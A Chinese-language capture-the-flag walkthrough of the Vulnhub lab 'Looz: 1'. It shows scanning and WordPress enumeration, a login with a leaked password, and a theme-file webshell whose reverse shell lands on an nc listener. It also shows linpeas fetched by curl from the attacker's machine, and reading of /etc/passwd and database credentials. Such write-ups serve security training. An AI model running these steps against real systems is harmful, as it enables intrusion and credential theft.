【Vulnhub 靶场】【Looz: 1】【简单】【20210802】

1、环境介绍

靶场介绍：https://www.vulnhub.com/entry/looz-1,732/
靶场下载：https://download.vulnhub.com/looz/Looz.zip
靶场难度：简单
发布日期：2021年08月02日
文件大小：2.1 GB
靶场作者：mhz_cyber & Zamba
靶场系列：Looz
靶场描述：

• 没有那么难也没有那么容易，如果你能在脑海中想象出来，它总是很简单的。
• 如果你需要任何帮助，你可以在推特@mhz_cyber上找到我，我很乐意阅读你的文章，伙计也会在推特上发送。
  • 推特：@mhz_cyber，@I_ma7amd
  • 领英：mhzcyber，muhammadokasha
• 与 VMware 相比，这在 VirtualBox 中效果更好。

打靶耗时：3+ 小时，中途绕了个弯，以为是 Docker 容器逃逸，没想到居然是 SSH 爆破。
打靶关键：

1. Web 目录扫描、HTML/JS 静态阅读
2. WordPress Getshell 方法、WordPress 信息收集
3. SSH 爆破、SUID 提权

2、主机发现与端口扫描

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:cb:7e:f5, IPv4: 192.168.56.3
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    3a:f9:d3:90:a4:66       (Unknown: locally administered)
192.168.56.30   08:00:27:f9:e5:ef       PCS Systemtechnik GmbH2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.320 seconds (110.34 hosts/sec). 2 responded

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nmap -T4 -sC -sV -p- -A --min-rate=1000 192.168.56.30
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-11 02:26 EST
Nmap scan report for 192.168.56.30
Host is up (0.00058s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT     STATE  SERVICE      VERSION
22/tcp   open   ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b4:80:23:86:76:97:19:09:9d:50:b1:94:c9:8d:a5:0c (RSA)
|   256 3d:52:5e:29:fb:2f:29:e8:01:e4:5d:1b:a1:1e:f3:4b (ECDSA)
|_  256 f0:f4:77:dc:3d:53:c3:c5:35:82:87:a5:ba:57:b4:49 (ED25519)
80/tcp   open   http         nginx 1.18.0 (Ubuntu)
|_http-title: Home
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-generator: Nicepage 3.15.3, nicepage.com
139/tcp  closed netbios-ssn
445/tcp  closed microsoft-ds
3306/tcp open   mysql        MySQL 5.5.5-10.5.10-MariaDB-1:10.5.10+maria~focal
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.5.10-MariaDB-1:10.5.10+maria~focal
|   Thread ID: 11
|   Capabilities flags: 63486
|   Some Capabilities: IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, LongColumnFlag, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, IgnoreSigpipes, Support41Auth, ODBCClient, SupportsCompression, InteractiveClient, Speaks41ProtocolNew, SupportsLoadDataLocal, SupportsTransactions, FoundRows, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: ,UGEcEknd*E[{zrLe:-r
|_  Auth Plugin Name: mysql_native_password
8081/tcp open   http         Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to http://192.168.56.30/
MAC Address: 08:00:27:F9:E5:EF (Oracle VirtualBox virtual NIC)
Device type: general purpose|storage-misc|media device|WAP
Running (JUST GUESSING): Linux 5.X|4.X|2.6.X|3.X (98%), HP embedded (89%), Infomir embedded (89%), Ubiquiti embedded (89%)
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/h:hp:p2000_g3 cpe:/h:infomir:mag-250 cpe:/o:linux:linux_kernel:2.6.32 cpe:/h:ubnt:airmax_nanostation
Aggressive OS guesses: Linux 5.0 - 5.4 (98%), Linux 4.15 - 5.8 (94%), Linux 5.0 - 5.5 (93%), Linux 2.6.32 - 3.13 (93%), Linux 2.6.39 (93%), Linux 5.1 (92%), Linux 2.6.22 - 2.6.36 (91%), Linux 3.10 - 4.11 (91%), Linux 5.0 (91%), Linux 5.4 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: 172.17.0.3; OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT     ADDRESS
1   0.58 ms 192.168.56.30OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.80 seconds

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nmap --script=vuln -p- 192.168.56.30          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-11 02:31 EST
Nmap scan report for 192.168.56.30
Host is up (0.00044s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
| http-fileupload-exploiter: 
|   
|     Couldn·t find a file-type field.
|   
|_    Couldn·t find a file-type field.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-dombased-xss: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.30
|   Found the following indications of potential DOM based XSS: 
|     
|     Source: window.open(i.href,"pswp_share","scrollbars=yes,resizable=yes,toolbar=no,"+"location=yes,width=550,height=420,top=100,left="+(window.screen?Math.round(screen.width/2-275)
|_    Pages: http://192.168.56.30:80/nicepage.js
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.30
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.56.30:80/
|     Form id: name-30a4
|     Form action: #
|     
|     Path: http://192.168.56.30:80/index.html
|     Form id: name-30a4
|_    Form action: #
| http-vuln-cve2011-3192: 
|   VULNERABLE:
|   Apache byterange filter DoS
|     State: VULNERABLE
|     IDs:  CVE:CVE-2011-3192  BID:49303
|       The Apache web server is vulnerable to a denial of service attack when numerous
|       overlapping byte ranges are requested.
|     Disclosure date: 2011-08-19
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|       https://www.tenable.com/plugins/nessus/55976
|       https://seclists.org/fulldisclosure/2011/Aug/175
|_      https://www.securityfocus.com/bid/49303
139/tcp  closed netbios-ssn
445/tcp  closed microsoft-ds
3306/tcp open   mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
8081/tcp open   blackice-icecap
MAC Address: 08:00:27:F9:E5:EF (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 181.60 seconds

• 8081端口：永久重定向到80端口

3、静态信息检查 HTML和JS

• 获取 wp 用户密码：john:y0uC@n'tbr3akIT

john don't forget to remove this comment, for now wp password is  y0uC@n'tbr3akIT
约翰别忘了删除这个评论，目前 wp 密码是 y0uC@n'tbr3akIT

• 工具检测

(py310) ┌──(root㉿kali)-[~/pinkerton] (๑•̀ㅂ•́)و✧ 
└─# python3 main.py -u http://192.168.56.30/,_.-"` `'-.'._ __{}_(|'--.__\   Pinkerton 1.6c(   ^_\^    Investigating JavaScript files since 1850|   _ |    by oppsec)\___/.--'`:._]
jgs /  \      `-.[+] Connected sucessfully with http://192.168.56.30/
[*] Extracting JavaScript files from http://192.168.56.30/
[+] Found 2 JavaScript file(s) 
[+] Scanning: http://192.168.56.30/jquery.js
[+] Scanning: http://192.168.56.30/nicepage.js[+] URL Parameter found in http://192.168.56.30/nicepage.js ~ ['key', 'callback', 'language', 'c', 'gid', 
'gid', 'u', 'text', 'url', 'url', 'media', 'description']

4、目录扫描

4.1、80端口

# 基础小字典，初扫摸底
dirb http://192.168.56.30
# 较全面 conda activate py37
dirsearch -u http://192.168.56.30 -t 64 -e *
# 包含静态检查 conda activate py310
cd ~/dirsearch_bypass403 ; python dirsearch.py -u "http://192.168.56.30" -j yes -b yes
# 较全面 Plus conda activate py39
cd ~/soft/dirmap ; python3 dirmap.py -i http://192.168.56.30 -lcf
# 常规文件扫描
gobuster dir -u http://192.168.56.30 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
# 可执行文件扫描
gobuster dir -u http://192.168.56.30 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x js,aspx,cgi,sh,jsp -e -k -r -q
# 压缩包，备份扫描
gobuster dir -u http://192.168.56.30 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x rar,zip,7z,tar.gz,bak,txt,old,temp -e -k -r -q

(py39) ┌──(root㉿kali)-[~/dirsearch_bypass403] (๑•̀ㅂ•́)و✧ 
└─# cd ~/soft/dirmap ; python3 dirmap.py -i http://192.168.56.30 -lcf#####  # #####  #    #   ##   ######    # # #    # ##  ##  #  #  #    ##    # # #    # # ## # #    # #    ##    # # #####  #    # ###### ######    # # #   #  #    # #    # ######  # #    # #    # #    # #   v1.0[*] Initialize targets...
[+] Load targets from: http://192.168.56.30
[+] Set the number of thread: 30
[+] Coroutine mode
[+] Current target: http://192.168.56.30/                                                                   
[*] Launching auto check 404
[+] Checking with: http://192.168.56.30/jgmlamkroxrwsanonhhrucxuxrqaehilbpdddwqgoc
[*] Use recursive scan: No                                                                                  
[*] Use dict mode
[+] Load dict:/root/soft/dirmap/data/dict_mode_dict.txt
[*] Use crawl mode
[200][text/html][36.77kb] http://192.168.56.30/index.html                                                   
[200][image/jpeg][155.07kb] http://192.168.56.30/images/a9dcc2d3-077b-4cbf-35f1-05a7ca2b6438.jpg            
[200][image/jpeg][139.51kb] http://192.168.56.30/images/yh-min.jpg                                          
[200][application/javascript][156.45kb] http://192.168.56.30/nicepage.js                                    
[200][image/jpeg][144.28kb] http://192.168.56.30/images/srwer.jpg                                           
[200][image/jpeg][85.60kb] http://192.168.56.30/images/fff-min.jpg                                          
[200][application/javascript][87.38kb] http://192.168.56.30/jquery.js                                       
[200][image/jpeg][511.22kb] http://192.168.56.30/images/re.jpg                                              
[200][text/css][1.03mb] http://192.168.56.30/nicepage.css                                                   
[200][image/jpeg][18.97kb] http://192.168.56.30/images/business-cards-mockup_1389-1137.jpg                  
[200][image/jpeg][47.29kb] http://192.168.56.30/images/elegant-minimal-black-yellow-business-card-template_1017-22513.jpg
[200][image/jpeg][140.58kb] http://192.168.56.30/images/black-screen-smartphone-mockup-design_53876-65977.jpg
[200][image/jpeg][51.43kb] http://192.168.56.30/images/four-books-mockup_125540-455.jpg                     
[200][image/jpeg][203.50kb] http://192.168.56.30/images/rtttt.jpg                                           
[200][text/html][36.77kb] http://192.168.56.30/index.html                                                   
[200][image/jpeg][25.05kb] http://192.168.56.30/images/book-cover-mockup_125540-453.jpg                     
[200][image/png][1.68mb] http://192.168.56.30/images/5872304-0.png                                          
[200][image/jpeg][37.01kb] http://192.168.56.30/images/rr.jpg                                               
[200][text/css][25.93kb] http://192.168.56.30/Home.css                                                      
100% (6775 of 6775) |#################################################| Elapsed Time: 0:00:25 Time:  0:00:25

• http://192.168.56.30/index.html
• http://192.168.56.30/nicepage.js
• http://192.168.56.30/jquery.js
• http://192.168.56.30/images/

4.2、8081端口

# 基础小字典，初扫摸底
dirb http://192.168.56.30:8081
# 较全面 conda activate py37
dirsearch -u http://192.168.56.30:8081 -t 64 -e *
# 包含静态检查 conda activate py310
cd ~/dirsearch_bypass403 ; python dirsearch.py -u "http://192.168.56.30:8081" -j yes -b yes
# 较全面 Plus conda activate py39
cd ~/soft/dirmap ; python3 dirmap.py -i http://192.168.56.30:8081 -lcf
# 常规文件扫描
gobuster dir -u http://192.168.56.30:8081 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
# 可执行文件扫描
gobuster dir -u http://192.168.56.30:8081 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x js,aspx,cgi,sh,jsp -e -k -r -q
# 压缩包，备份扫描
gobuster dir -u http://192.168.56.30:8081 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x rar,zip,7z,tar.gz,bak,txt,old,temp -e -k -r -q

• http://192.168.56.30:8081/index.php
• http://192.168.56.30:8081/server-status
• http://192.168.56.30:8081/xmlrpc.php
• http://192.168.56.30:8081/license.txt
• http://192.168.56.30:8081/readme.html
• http://192.168.56.30:8081/wp-cron.php
• http://192.168.56.30:8081/wp-login.php
• http://192.168.56.30:8081/wp-config.php
• http://192.168.56.30:8081/wp-admin/install.php
• http://192.168.56.30:8081/wp-includes/rss-functions.php
• http://192.168.56.30:8081/wp-admin/
• http://192.168.56.30:8081/wp-content/
• http://192.168.56.30:8081/wp-includes/

4.3、添加hosts

5、8081端口 - CMS

(py37) ┌──(root㉿kali)-[~/pinkerton] (๑•̀ㅂ•́)و✧ 
└─# wpscan --url http://wp.looz.com/ --ignore-main-redirect --force -e --plugins-detection aggressive
_________________________________________________________________          _______   _____\ \        / /  __ \ / ____|\ \  /\  / /| |__) | (___   ___  __ _ _ __ ®\ \/  \/ / |  ___/ \___ \ / __|/ _` | `_ \\  /\  /  | |     ____) | (__| (_| | | | |\/  \/   |_|    |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan TeamVersion 3.8.25Sponsored by Automattic - https://automattic.com/@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[+] URL: http://wp.looz.com/ [192.168.56.30]
[+] Started: Sat Nov 11 07:26:39 2023Interesting Finding(s):[+] Headers| Interesting Entries:|  - Server: nginx/1.18.0 (Ubuntu)|  - X-Powered-By: PHP/7.4.20| Found By: Headers (Passive Detection)| Confidence: 100%[+] XML-RPC seems to be enabled: http://wp.looz.com/xmlrpc.php| Found By: Direct Access (Aggressive Detection)| Confidence: 100%| References:|  - http://codex.wordpress.org/XML-RPC_Pingback_API|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/|  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/[+] WordPress readme found: http://wp.looz.com/readme.html| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] The external WP-Cron seems to be enabled: http://wp.looz.com/wp-cron.php| Found By: Direct Access (Aggressive Detection)| Confidence: 60%| References:|  - https://www.iplocation.net/defend-wordpress-from-ddos|  - https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 5.7.2 identified (Insecure, released on 2021-05-12).| Found By: Rss Generator (Passive Detection)|  - http://wp.looz.com/?feed=rss2, <generator>https://wordpress.org/?v=5.7.2</generator>|  - http://wp.looz.com/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.7.2</generator>[+] WordPress theme in use: twentytwentyone| Location: http://wp.looz.com/wp-content/themes/twentytwentyone/| Last Updated: 2023-03-29T00:00:00.000Z| Readme: http://wp.looz.com/wp-content/themes/twentytwentyone/readme.txt| [!] The version is out of date, the latest version is 1.8| Style URL: http://wp.looz.com/wp-content/themes/twentytwentyone/style.css?ver=1.3| Style Name: Twenty Twenty-One| Style URI: https://wordpress.org/themes/twentytwentyone/| Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...| Author: the WordPress team| Author URI: https://wordpress.org/|| Found By: Css Style In Homepage (Passive Detection)|| Version: 1.3 (80% confidence)| Found By: Style (Passive Detection)|  - http://wp.looz.com/wp-content/themes/twentytwentyone/style.css?ver=1.3, Match: 'Version: 1.3'[+] Enumerating Vulnerable Plugins (via Aggressive Methods)Checking Known Locations - Time: 00:00:23 <=====================================> (6539 / 6539) 100.00% Time: 00:00:23
[+] Checking Plugin Versions (via Passive and Aggressive Methods)[i] No plugins Found.[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)Checking Known Locations - Time: 00:00:02 <=======================================> (624 / 624) 100.00% Time: 00:00:02
[+] Checking Theme Versions (via Passive and Aggressive Methods)[i] No themes Found.[+] Enumerating Timthumbs (via Passive and Aggressive Methods)Checking Known Locations - Time: 00:00:07 <=====================================> (2575 / 2575) 100.00% Time: 00:00:07[i] No Timthumbs Found.[+] Enumerating Config Backups (via Passive and Aggressive Methods)Checking Config Backups - Time: 00:00:00 <========================================> (137 / 137) 100.00% Time: 00:00:00[i] No Config Backups Found.[+] Enumerating DB Exports (via Passive and Aggressive Methods)Checking DB Exports - Time: 00:00:00 <==============================================> (80 / 80) 100.00% Time: 00:00:00[i] No DB Exports Found.[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)Brute Forcing Attachment IDs - Time: 00:00:01 <===================================> (100 / 100) 100.00% Time: 00:00:01[i] No Medias Found.[+] Enumerating Users (via Passive and Aggressive Methods)Brute Forcing Author IDs - Time: 00:00:00 <=========================================> (10 / 10) 100.00% Time: 00:00:00[i] User(s) Identified:[+] john| Found By: Author Posts - Display Name (Passive Detection)| Confirmed By:|  Rss Generator (Passive Detection)|  Author Id Brute Forcing - Author Pattern (Aggressive Detection)|  Login Error Messages (Aggressive Detection)[+] mason| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] william| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] james| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] evelyn| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] harper| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] gandalf| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register[+] Finished: Sat Nov 11 07:27:23 2023
[+] Requests Done: 10124
[+] Cached Requests: 8
[+] Data Sent: 2.699 MB
[+] Data Received: 2.299 MB
[+] Memory used: 304.871 MB
[+] Elapsed time: 00:00:43

6、WP登录

• 当前管理电子邮件：john@looz.com

john : y0uC@n'tbr3akIT

• 点击「更新」：无法打开

7、写入WebShell

• 当前主题，无法修改PHP

• 更换其他主题，一次就保存好了

8、WebShell反弹连接

• 访问PHP文件（上面CMS扫描有主题路径可以参考，或者直接百度）

http://wp.looz.com/wp-content/themes/twentytwenty/404.php

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# nc -lvnp 7890                            
listening on [any] 7890 ...
connect to [192.168.56.3] from (UNKNOWN) [192.168.56.30] 37328
Linux a5610f5f2480 5.4.0-74-generic #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021 x86_64 GNU/Linux13:18:48 up  5:56,  0 users,  load average: 1.00, 1.00, 1.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ SHELL=/bin/bash script -q /dev/null
www-data@a5610f5f2480:/$

8.1、常规信息收集（真是干净呀，啥都没有）

www-data@a5610f5f2480:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

www-data@a5610f5f2480:/$ history        
history1  cat /etc/passwd2  history
www-data@a5610f5f2480:/$ sudo -l
sudo -l
bash: sudo: command not found
www-data@a5610f5f2480:/$ /usr/sbin/getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null
www-data@a5610f5f2480:/$ crontab -l
crontab -l
bash: crontab: command not found
www-data@a5610f5f2480:/$ cat /etc/crontab
cat /etc/crontab
cat: /etc/crontab: No such file or directory
www-data@a5610f5f2480:/$ hostnamectl
hostnamectl
bash: hostnamectl: command not found
www-data@a5610f5f2480:/$ uname -a
uname -a
Linux a5610f5f2480 5.4.0-74-generic #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021 x86_64 GNU/Linux
www-data@a5610f5f2480:/$ cat /etc/issue
cat /etc/issue
Debian GNU/Linux 10 \n \lwww-data@a5610f5f2480:/$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
www-data@a5610f5f2480:/$ echo $BASH_VERSION
echo $BASH_VERSION
5.0.3(1)-release
www-data@a5610f5f2480:/$

8.2、文件信息收集

www-data@a5610f5f2480:/$ cd ~
cd ~
www-data@a5610f5f2480:/var/www$ ls -al
ls -al
total 12
drwxr-xr-x 1 root     root     4096 May 12  2021 .
drwxr-xr-x 1 root     root     4096 May 12  2021 ..
drwxr-xr-x 5 www-data www-data 4096 Jun  7  2021 html
www-data@a5610f5f2480:/var/www$ cd html
cd html
www-data@a5610f5f2480:/var/www/html$ ls
ls
index.php           wp-comments-post.php  wp-includes        wp-signup.php
license.txt         wp-config-docker.php  wp-links-opml.php  wp-trackback.php
readme.html         wp-config-sample.php  wp-load.php        xmlrpc.php
wp-activate.php     wp-config.php         wp-login.php
wp-admin            wp-content            wp-mail.php
wp-blog-header.php  wp-cron.php           wp-settings.php
www-data@a5610f5f2480:/var/www$ find / -user root -perm /4000 2>/dev/null
find / -user root -perm /4000 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/bin/mount
/bin/su
/bin/umount
www-data@a5610f5f2480:/var/www$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/bin/mount
/bin/su
/bin/umount
www-data@a5610f5f2480:/var/www$ find / -type f -user root -perm -o=w 2>/dev/null | grep -v "/sys/" | grep -v "/proc/"| grep -v "/sys/" | grep -v "/proc/"2>/dev/null 
www-data@a5610f5f2480:/var/www$ find / -group $USER -perm -u=rwx 2>/dev/null | grep -v "/proc/"
rep -v "/proc/"USER -perm -u=rwx 2>/dev/null | gr
www-data@a5610f5f2480:/var/www$

8.3、进程信息

www-data@a5610f5f2480:/var/www$ ps aux
ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  1.6 236492 33084 pts/0    Ss   07:23   0:04 apache2 -DFOR
www-data      21  0.1  2.3 316260 47304 pts/0    S    07:23   0:32 apache2 -DFOR
www-data      27  0.1  2.2 314120 45468 pts/0    S    07:28   0:33 apache2 -DFOR
www-data      37  0.0  2.1 314016 44760 pts/0    S    09:41   0:07 apache2 -DFOR
www-data      38  0.0  2.3 314208 47540 pts/0    S    09:41   0:08 apache2 -DFOR
www-data      55  0.0  2.1 313796 44752 pts/0    S    10:07   0:07 apache2 -DFOR
www-data      67  0.1  2.2 314140 44988 pts/0    S    12:09   0:06 apache2 -DFOR
www-data      69  0.1  2.1 312128 43776 pts/0    S    12:09   0:06 apache2 -DFOR
www-data      70  0.0  2.1 314048 43560 pts/0    S    12:09   0:04 apache2 -DFOR
www-data      71  0.0  2.2 314160 45656 pts/0    S    12:09   0:04 apache2 -DFOR
www-data      72  0.0  2.1 314172 44560 pts/0    S    12:09   0:04 apache2 -DFOR
www-data     136  0.0  0.0   2384   760 pts/0    S    13:18   0:00 sh -c uname -
www-data     140  0.0  0.0   2384   696 pts/0    S    13:18   0:00 /bin/sh -i
www-data     143  0.0  0.0   2588  1788 pts/0    S+   13:22   0:00 script -q /de
www-data     144  0.0  0.1   4016  3240 pts/1    Ss   13:22   0:00 bash -i
www-data     168  0.0  0.1   7636  2704 pts/1    R+   13:39   0:00 ps aux
www-data@a5610f5f2480:/var/www$ ps -ef
ps -ef
UID          PID    PPID  C STIME TTY          TIME CMD
root           1       0  0 07:23 pts/0    00:00:04 apache2 -DFOREGROUND
www-data      21       1  0 07:23 pts/0    00:00:32 apache2 -DFOREGROUND
www-data      27       1  0 07:28 pts/0    00:00:33 apache2 -DFOREGROUND
www-data      37       1  0 09:41 pts/0    00:00:07 apache2 -DFOREGROUND
www-data      38       1  0 09:41 pts/0    00:00:08 apache2 -DFOREGROUND
www-data      55       1  0 10:07 pts/0    00:00:07 apache2 -DFOREGROUND
www-data      67       1  0 12:09 pts/0    00:00:06 apache2 -DFOREGROUND
www-data      69       1  0 12:09 pts/0    00:00:06 apache2 -DFOREGROUND
www-data      70       1  0 12:09 pts/0    00:00:04 apache2 -DFOREGROUND
www-data      71       1  0 12:09 pts/0    00:00:04 apache2 -DFOREGROUND
www-data      72       1  0 12:09 pts/0    00:00:04 apache2 -DFOREGROUND
www-data     136      71  0 13:18 pts/0    00:00:00 sh -c uname -a; w; id; /bin/
www-data     140     136  0 13:18 pts/0    00:00:00 /bin/sh -i
www-data     143     140  0 13:22 pts/0    00:00:00 script -q /dev/null
www-data     144     143  0 13:22 pts/1    00:00:00 bash -i
www-data     169     144  0 13:39 pts/1    00:00:00 ps -ef

8.4、提权脚本

www-data@a5610f5f2480:/var/www$ curl -o linpeas.sh http://192.168.56.3:8080/linpeas.sh
eas.sho linpeas.sh http://192.168.56.3:8080/linpe% Total    % Received % Xferd  Average Speed   Time    Time     Time  CurrentDload  Upload   Total   Spent    Left  Speed0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0Warning: Failed to create the file linpeas.sh: Permission denied1  827k    1 11584    0     0   202k      0  0:00:04 --:--:--  0:00:04  202k
curl: (23) Failed writing body (0 != 11584)
www-data@a5610f5f2480:/var/www$ ls
ls
html
www-data@a5610f5f2480:/var/www$ cd html
cd html
www-data@a5610f5f2480:/var/www/html$ curl -o linpeas.sh http://192.168.56.3:8080/linpeas.sh
/linpeas.shpeas.sh http://192.168.56.3:8080/% Total    % Received % Xferd  Average Speed   Time    Time     Time  CurrentDload  Upload   Total   Spent    Left  Speed
100  827k  100  827k    0     0  36.7M      0 --:--:-- --:--:-- --:--:-- 36.7M
www-data@a5610f5f2480:/var/www/html$ ls
ls
index.php        wp-blog-header.php    wp-cron.php        wp-settings.php
license.txt      wp-comments-post.php  wp-includes        wp-signup.php
linpeas.sh       wp-config-docker.php  wp-links-opml.php  wp-trackback.php
readme.html      wp-config-sample.php  wp-load.php        xmlrpc.php
wp-activate.php  wp-config.php         wp-login.php
wp-admin         wp-content            wp-mail.php
www-data@a5610f5f2480:/var/www/html$ chmod 777 linpeas.sh
chmod 777 linpeas.sh
www-data@a5610f5f2480:/var/www/html$ ./linpeas.sh -a > ./linpeas.txt
./linpeas.sh -a > ./linpeas.txt
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . sed: -e expression #1, char 0: no previous regular expression
awk: write failure (Broken pipe)
awk: close failed on file /dev/stdout (Broken pipe)
uniq: write error: Broken pipe
grep: write error: Broken pipe
www-data@a5610f5f2480:/var/www/html$ less -r ./linpeas.txt
less -r ./linpeas.txt
bash: less: command not found

• Kali下载

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# wget http://wp.looz.com/linpeas.txt
--2023-11-11 08:56:45--  http://wp.looz.com/linpeas.txt
正在解析主机 wp.looz.com (wp.looz.com)... 192.168.56.30
正在连接 wp.looz.com (wp.looz.com)|192.168.56.30|:80... 已连接。
已发出 HTTP 请求，正在等待回应... 200 OK
长度：136746 (134K) [text/plain]
正在保存至: “linpeas.txt”linpeas.txt                       100%[============================================================>] 133.54K  --.-KB/s  用时 0.006s  2023-11-11 08:56:45 (21.1 MB/s) - 已保存 “linpeas.txt” [136746/136746])

• 内网IP，有些可疑：172.17.0.2

WORDPRESS_DB_PASSWORD=Ba2k3t
WORDPRESS_DB_USER=dbadmin
WORDPRESS_DB_NAME=wpdb
MYSQL_PORT=tcp://172.17.0.2:3306
MYSQL_PORT_3306_TCP_ADDR=172.17.0.2
MYSQL_ENV_MYSQL_PASSWORD=Ba2k3t
MYSQL_ENV_MYSQL_USER=dbadmin
MYSQL_ENV_MYSQL_ROOT_PASSWORD=root-password

• 找到Docker文件，怀疑可能在容器内

www-data@a5610f5f2480:/var/www/html$ cat /proc/1/cgroup
cat /proc/1/cgroup
12:blkio:/docker/a5610f5f24807722a624537cf129b03390e93e10afe0bc9aceb09eaebf973154
